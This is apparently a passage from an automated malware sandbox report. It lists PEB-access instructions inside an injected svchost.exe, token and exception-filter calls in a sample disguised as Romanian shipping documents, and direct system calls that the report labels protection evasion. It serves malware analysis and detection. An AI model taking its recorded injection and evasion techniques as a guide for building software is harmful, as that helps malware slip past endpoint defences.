Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03638BF0 mov eax, dword ptr fs:[00000030h]	2_2_03638BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0365EBFC mov eax, dword ptr fs:[00000030h]	2_2_0365EBFC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036BCBF0 mov eax, dword ptr fs:[00000030h]	2_2_036BCBF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03650BCB mov eax, dword ptr fs:[00000030h]	2_2_03650BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03650BCB mov eax, dword ptr fs:[00000030h]	2_2_03650BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03650BCB mov eax, dword ptr fs:[00000030h]	2_2_03650BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03630BCD mov eax, dword ptr fs:[00000030h]	2_2_03630BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03630BCD mov eax, dword ptr fs:[00000030h]	2_2_03630BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03630BCD mov eax, dword ptr fs:[00000030h]	2_2_03630BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036DEBD0 mov eax, dword ptr fs:[00000030h]	2_2_036DEBD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03640BBE mov eax, dword ptr fs:[00000030h]	2_2_03640BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03640BBE mov eax, dword ptr fs:[00000030h]	2_2_03640BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366CA6F mov eax, dword ptr fs:[00000030h]	2_2_0366CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366CA6F mov eax, dword ptr fs:[00000030h]	2_2_0366CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366CA6F mov eax, dword ptr fs:[00000030h]	2_2_0366CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036ACA72 mov eax, dword ptr fs:[00000030h]	2_2_036ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036ACA72 mov eax, dword ptr fs:[00000030h]	2_2_036ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h]	2_2_03636A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h]	2_2_03636A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h]	2_2_03636A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h]	2_2_03636A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h]	2_2_03636A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h]	2_2_03636A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h]	2_2_03636A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03640A5B mov eax, dword ptr fs:[00000030h]	2_2_03640A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03640A5B mov eax, dword ptr fs:[00000030h]	2_2_03640A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366CA24 mov eax, dword ptr fs:[00000030h]	2_2_0366CA24
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0365EA2E mov eax, dword ptr fs:[00000030h]	2_2_0365EA2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03654A35 mov eax, dword ptr fs:[00000030h]	2_2_03654A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03654A35 mov eax, dword ptr fs:[00000030h]	2_2_03654A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366CA38 mov eax, dword ptr fs:[00000030h]	2_2_0366CA38
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036BCA11 mov eax, dword ptr fs:[00000030h]	2_2_036BCA11
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366AAEE mov eax, dword ptr fs:[00000030h]	2_2_0366AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366AAEE mov eax, dword ptr fs:[00000030h]	2_2_0366AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03686ACC mov eax, dword ptr fs:[00000030h]	2_2_03686ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03686ACC mov eax, dword ptr fs:[00000030h]	2_2_03686ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03686ACC mov eax, dword ptr fs:[00000030h]	2_2_03686ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03630AD0 mov eax, dword ptr fs:[00000030h]	2_2_03630AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03664AD0 mov eax, dword ptr fs:[00000030h]	2_2_03664AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03664AD0 mov eax, dword ptr fs:[00000030h]	2_2_03664AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03638AA0 mov eax, dword ptr fs:[00000030h]	2_2_03638AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03638AA0 mov eax, dword ptr fs:[00000030h]	2_2_03638AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03686AA4 mov eax, dword ptr fs:[00000030h]	2_2_03686AA4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]	2_2_0363EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]	2_2_0363EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]	2_2_0363EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]	2_2_0363EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]	2_2_0363EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]	2_2_0363EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]	2_2_0363EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]	2_2_0363EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]	2_2_0363EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03704A80 mov eax, dword ptr fs:[00000030h]	2_2_03704A80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03668A90 mov edx, dword ptr fs:[00000030h]	2_2_03668A90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03656962 mov eax, dword ptr fs:[00000030h]	2_2_03656962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03656962 mov eax, dword ptr fs:[00000030h]	2_2_03656962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03656962 mov eax, dword ptr fs:[00000030h]	2_2_03656962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0367096E mov eax, dword ptr fs:[00000030h]	2_2_0367096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0367096E mov edx, dword ptr fs:[00000030h]	2_2_0367096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0367096E mov eax, dword ptr fs:[00000030h]	2_2_0367096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036BC97C mov eax, dword ptr fs:[00000030h]	2_2_036BC97C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B0946 mov eax, dword ptr fs:[00000030h]	2_2_036B0946
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B892A mov eax, dword ptr fs:[00000030h]	2_2_036B892A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036C892B mov eax, dword ptr fs:[00000030h]	2_2_036C892B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036AE908 mov eax, dword ptr fs:[00000030h]	2_2_036AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036AE908 mov eax, dword ptr fs:[00000030h]	2_2_036AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036BC912 mov eax, dword ptr fs:[00000030h]	2_2_036BC912
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03628918 mov eax, dword ptr fs:[00000030h]	2_2_03628918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03628918 mov eax, dword ptr fs:[00000030h]	2_2_03628918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036BE9E0 mov eax, dword ptr fs:[00000030h]	2_2_036BE9E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036629F9 mov eax, dword ptr fs:[00000030h]	2_2_036629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036629F9 mov eax, dword ptr fs:[00000030h]	2_2_036629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036C69C0 mov eax, dword ptr fs:[00000030h]	2_2_036C69C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0363A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0363A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0363A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0363A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0363A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0363A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0363A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0363A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0363A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0363A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0363A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0363A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036649D0 mov eax, dword ptr fs:[00000030h]	2_2_036649D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036FA9D3 mov eax, dword ptr fs:[00000030h]	2_2_036FA9D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]	2_2_036429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]	2_2_036429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]	2_2_036429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]	2_2_036429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]	2_2_036429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]	2_2_036429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]	2_2_036429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]	2_2_036429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]	2_2_036429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]	2_2_036429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]	2_2_036429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]	2_2_036429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]	2_2_036429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036309AD mov eax, dword ptr fs:[00000030h]	2_2_036309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036309AD mov eax, dword ptr fs:[00000030h]	2_2_036309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B89B3 mov esi, dword ptr fs:[00000030h]	2_2_036B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B89B3 mov eax, dword ptr fs:[00000030h]	2_2_036B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B89B3 mov eax, dword ptr fs:[00000030h]	2_2_036B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036BE872 mov eax, dword ptr fs:[00000030h]	2_2_036BE872
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036BE872 mov eax, dword ptr fs:[00000030h]	2_2_036BE872
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036C6870 mov eax, dword ptr fs:[00000030h]	2_2_036C6870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036C6870 mov eax, dword ptr fs:[00000030h]	2_2_036C6870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03642840 mov ecx, dword ptr fs:[00000030h]	2_2_03642840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03660854 mov eax, dword ptr fs:[00000030h]	2_2_03660854
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03634859 mov eax, dword ptr fs:[00000030h]	2_2_03634859
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03634859 mov eax, dword ptr fs:[00000030h]	2_2_03634859
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03652835 mov eax, dword ptr fs:[00000030h]	2_2_03652835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03652835 mov eax, dword ptr fs:[00000030h]	2_2_03652835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03652835 mov eax, dword ptr fs:[00000030h]	2_2_03652835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03652835 mov ecx, dword ptr fs:[00000030h]	2_2_03652835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03652835 mov eax, dword ptr fs:[00000030h]	2_2_03652835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03652835 mov eax, dword ptr fs:[00000030h]	2_2_03652835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366A830 mov eax, dword ptr fs:[00000030h]	2_2_0366A830
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036BC810 mov eax, dword ptr fs:[00000030h]	2_2_036BC810
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036FA8E4 mov eax, dword ptr fs:[00000030h]	2_2_036FA8E4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366C8F9 mov eax, dword ptr fs:[00000030h]	2_2_0366C8F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366C8F9 mov eax, dword ptr fs:[00000030h]	2_2_0366C8F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0365E8C0 mov eax, dword ptr fs:[00000030h]	2_2_0365E8C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03630887 mov eax, dword ptr fs:[00000030h]	2_2_03630887
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036BC89D mov eax, dword ptr fs:[00000030h]	2_2_036BC89D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0365AF69 mov eax, dword ptr fs:[00000030h]	2_2_0365AF69
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0365AF69 mov eax, dword ptr fs:[00000030h]	2_2_0365AF69
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03704F68 mov eax, dword ptr fs:[00000030h]	2_2_03704F68
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B4F40 mov eax, dword ptr fs:[00000030h]	2_2_036B4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B4F40 mov eax, dword ptr fs:[00000030h]	2_2_036B4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B4F40 mov eax, dword ptr fs:[00000030h]	2_2_036B4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B4F40 mov eax, dword ptr fs:[00000030h]	2_2_036B4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0362CF50 mov eax, dword ptr fs:[00000030h]	2_2_0362CF50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0362CF50 mov eax, dword ptr fs:[00000030h]	2_2_0362CF50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0362CF50 mov eax, dword ptr fs:[00000030h]	2_2_0362CF50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0362CF50 mov eax, dword ptr fs:[00000030h]	2_2_0362CF50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0362CF50 mov eax, dword ptr fs:[00000030h]	2_2_0362CF50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0362CF50 mov eax, dword ptr fs:[00000030h]	2_2_0362CF50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366CF50 mov eax, dword ptr fs:[00000030h]	2_2_0366CF50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0365EF28 mov eax, dword ptr fs:[00000030h]	2_2_0365EF28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036E6F00 mov eax, dword ptr fs:[00000030h]	2_2_036E6F00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03632F12 mov eax, dword ptr fs:[00000030h]	2_2_03632F12
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366CF1F mov eax, dword ptr fs:[00000030h]	2_2_0366CF1F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0364CFE0 mov eax, dword ptr fs:[00000030h]	2_2_0364CFE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0364CFE0 mov eax, dword ptr fs:[00000030h]	2_2_0364CFE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03670FF6 mov eax, dword ptr fs:[00000030h]	2_2_03670FF6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03670FF6 mov eax, dword ptr fs:[00000030h]	2_2_03670FF6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03670FF6 mov eax, dword ptr fs:[00000030h]	2_2_03670FF6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03670FF6 mov eax, dword ptr fs:[00000030h]	2_2_03670FF6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03704FE7 mov eax, dword ptr fs:[00000030h]	2_2_03704FE7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036E6FF7 mov eax, dword ptr fs:[00000030h]	2_2_036E6FF7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03632FC8 mov eax, dword ptr fs:[00000030h]	2_2_03632FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03632FC8 mov eax, dword ptr fs:[00000030h]	2_2_03632FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03632FC8 mov eax, dword ptr fs:[00000030h]	2_2_03632FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03632FC8 mov eax, dword ptr fs:[00000030h]	2_2_03632FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0362EFD8 mov eax, dword ptr fs:[00000030h]	2_2_0362EFD8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0362EFD8 mov eax, dword ptr fs:[00000030h]	2_2_0362EFD8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0362EFD8 mov eax, dword ptr fs:[00000030h]	2_2_0362EFD8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366CF80 mov eax, dword ptr fs:[00000030h]	2_2_0366CF80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03662F98 mov eax, dword ptr fs:[00000030h]	2_2_03662F98
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03662F98 mov eax, dword ptr fs:[00000030h]	2_2_03662F98
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03636E71 mov eax, dword ptr fs:[00000030h]	2_2_03636E71
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B0E7F mov eax, dword ptr fs:[00000030h]	2_2_036B0E7F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B0E7F mov eax, dword ptr fs:[00000030h]	2_2_036B0E7F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B0E7F mov eax, dword ptr fs:[00000030h]	2_2_036B0E7F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0362EE5A mov eax, dword ptr fs:[00000030h]	2_2_0362EE5A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03702E4F mov eax, dword ptr fs:[00000030h]	2_2_03702E4F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03702E4F mov eax, dword ptr fs:[00000030h]	2_2_03702E4F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036C6E20 mov eax, dword ptr fs:[00000030h]	2_2_036C6E20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036C6E20 mov eax, dword ptr fs:[00000030h]	2_2_036C6E20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036C6E20 mov ecx, dword ptr fs:[00000030h]	2_2_036C6E20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0365AE00 mov eax, dword ptr fs:[00000030h]	2_2_0365AE00

Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe

Code function: 0_2_009F80A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,

0_2_009F80A9

Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_009CA124 SetUnhandledExceptionFilter,		0_2_009CA124
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_009CA155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_009CA155

HIPS / PFW / Operating System Protection Evasion

Source: C:\Program Files (x86)\gXVCqRNOzOibuFXiseqZQlBHuSkWCDrzLlwHFybcUlDmIqNrdAwDnshXcPEsdGYRebR\hcwvcDPvVeAzsY.exe	NtProtectVirtualMemory: Direct from: 0x77542F9C	Jump to behavior
Source: C:\Program Files (x86)\gXVCqRNOzOibuFXiseqZQlBHuSkWCDrzLlwHFybcUlDmIqNrdAwDnshXcPEsdGYRebR\hcwvcDPvVeAzsY.exe	NtSetInformationProcess: Direct from: 0x77542C5C	Jump to behavior
Source: C:\Program Files (x86)\gXVCqRNOzOibuFXiseqZQlBHuSkWCDrzLlwHFybcUlDmIqNrdAwDnshXcPEsdGYRebR\hcwvcDPvVeAzsY.exe	NtOpenKeyEx: Direct from: 0x77542B9C	Jump to behavior
Source: C:\Program Files (x86)\gXVCqRNOzOibuFXiseqZQlBHuSkWCDrzLlwHFybcUlDmIqNrdAwDnshXcPEsdGYRebR\hcwvcDPvVeAzsY.exe	NtProtectVirtualMemory: Direct from: 0x77537B2E	Jump to behavior
Source: C:\Program Files (x86)\gXVCqRNOzOibuFXiseqZQlBHuSkWCDrzLlwHFybcUlDmIqNrdAwDnshXcPEsdGYRebR\hcwvcDPvVeAzsY.exe	NtCreateFile: Direct from: 0x77542FEC	Jump to behavior
Source: C:\Program Files (x86)\gXVCqRNOzOibuFXiseqZQlBHuSkWCDrzLlwHFybcUlDmIqNrdAwDnshXcPEsdGYRebR\hcwvcDPvVeAzsY.exe	NtOpenFile: Direct from: 0x77542DCC	Jump to behavior
Source: C:\Program Files (x86)\gXVCqRNOzOibuFXiseqZQlBHuSkWCDrzLlwHFybcUlDmIqNrdAwDnshXcPEsdGYRebR\hcwvcDPvVeAzsY.exe	NtQueryInformationToken: Direct from: 0x77542CAC	Jump to behavior
Source: C:\Program Files (x86)\gXVCqRNOzOibuFXiseqZQlBHuSkWCDrzLlwHFybcUlDmIqNrdAwDnshXcPEsdGYRebR\hcwvcDPvVeAzsY.exe	NtTerminateThread: Direct from: 0x77542FCC	Jump to behavior
Source: C:\Program Files (x86)\gXVCqRNOzOibuFXiseqZQlBHuSkWCDrzLlwHFybcUlDmIqNrdAwDnshXcPEsdGYRebR\hcwvcDPvVeAzsY.exe	NtDeviceIoControlFile: Direct from: 0x77542AEC	Jump to behavior
Source: C:\Program Files (x86)\gXVCqRNOzOibuFXiseqZQlBHuSkWCDrzLlwHFybcUlDmIqNrdAwDnshXcPEsdGYRebR\hcwvcDPvVeAzsY.exe	NtAllocateVirtualMemory: Direct from: 0x77542BEC	Jump to behavior
Source: C:\Program Files (x86)\gXVCqRNOzOibuFXiseqZQlBHuSkWCDrzLlwHFybcUlDmIqNrdAwDnshXcPEsdGYRebR\hcwvcDPvVeAzsY.exe	NtQueryVolumeInformationFile: Direct from: 0x77542F2C	Jump to behavior
Source: C:\Program Files (x86)\gXVCqRNOzOibuFXiseqZQlBHuSkWCDrzLlwHFybcUlDmIqNrdAwDnshXcPEsdGYRebR\hcwvcDPvVeAzsY.exe	NtOpenSection: Direct from: 0x77542E0C	Jump to behavior
Source: C:\Program Files (x86)\gXVCqRNOzOibuFXiseqZQlBHuSkWCDrzLlwHFybcUlDmIqNrdAwDnshXcPEsdGYRebR\hcwvcDPvVeAzsY.exe	NtAllocateVirtualMemory: Direct from: 0x775448EC	Jump to behavior
Source: C:\Program Files (x86)\gXVCqRNOzOibuFXiseqZQlBHuSkWCDrzLlwHFybcUlDmIqNrdAwDnshXcPEsdGYRebR\hcwvcDPvVeAzsY.exe	NtSetInformationThread: Direct from: 0x775363F9	Jump to behavior
Source: C:\Program Files (x86)\gXVCqRNOzOibuFXiseqZQlBHuSkWCDrzLlwHFybcUlDmIqNrdAwDnshXcPEsdGYRebR\hcwvcDPvVeAzsY.exe	NtQuerySystemInformation: Direct from: 0x775448CC	Jump to behavior
Source: C:\Program Files (x86)\gXVCqRNOzOibuFXiseqZQlBHuSkWCDrzLlwHFybcUlDmIqNrdAwDnshXcPEsdGYRebR\hcwvcDPvVeAzsY.exe	NtClose: Direct from: 0x77542B6C
Source: C:\Program Files (x86)\gXVCqRNOzOibuFXiseqZQlBHuSkWCDrzLlwHFybcUlDmIqNrdAwDnshXcPEsdGYRebR\hcwvcDPvVeAzsY.exe	NtReadVirtualMemory: Direct from: 0x77542E8C	Jump to behavior
Source: C:\Program Files (x86)\gXVCqRNOzOibuFXiseqZQlBHuSkWCDrzLlwHFybcUlDmIqNrdAwDnshXcPEsdGYRebR\hcwvcDPvVeAzsY.exe	NtCreateKey: Direct from: 0x77542C6C	Jump to behavior
Source: C:\Program Files (x86)\gXVCqRNOzOibuFXiseqZQlBHuSkWCDrzLlwHFybcUlDmIqNrdAwDnshXcPEsdGYRebR\hcwvcDPvVeAzsY.exe	NtSetInformationThread: Direct from: 0x77542B4C	Jump to behavior
Source: C:\Program Files (x86)\gXVCqRNOzOibuFXiseqZQlBHuSkWCDrzLlwHFybcUlDmIqNrdAwDnshXcPEsdGYRebR\hcwvcDPvVeAzsY.exe	NtQueryAttributesFile: Direct from: 0x77542E6C	Jump to behavior
Source: C:\Program Files (x86)\gXVCqRNOzOibuFXiseqZQlBHuSkWCDrzLlwHFybcUlDmIqNrdAwDnshXcPEsdGYRebR\hcwvcDPvVeAzsY.exe	NtAllocateVirtualMemory: Direct from: 0x77543C9C	Jump to behavior
Source: C:\Program Files (x86)\gXVCqRNOzOibuFXiseqZQlBHuSkWCDrzLlwHFybcUlDmIqNrdAwDnshXcPEsdGYRebR\hcwvcDPvVeAzsY.exe	NtCreateUserProcess: Direct from: 0x7754371C	Jump to behavior
Source: C:\Program Files (x86)\gXVCqRNOzOibuFXiseqZQlBHuSkWCDrzLlwHFybcUlDmIqNrdAwDnshXcPEsdGYRebR\hcwvcDPvVeAzsY.exe	NtQueryInformationProcess: Direct from: 0x77542C26	Jump to behavior
Source: C:\Program Files (x86)\gXVCqRNOzOibuFXiseqZQlBHuSkWCDrzLlwHFybcUlDmIqNrdAwDnshXcPEsdGYRebR\hcwvcDPvVeAzsY.exe	NtResumeThread: Direct from: 0x77542FBC	Jump to behavior
Source: C:\Program Files (x86)\gXVCqRNOzOibuFXiseqZQlBHuSkWCDrzLlwHFybcUlDmIqNrdAwDnshXcPEsdGYRebR\hcwvcDPvVeAzsY.exe	NtWriteVirtualMemory: Direct from: 0x7754490C	Jump to behavior
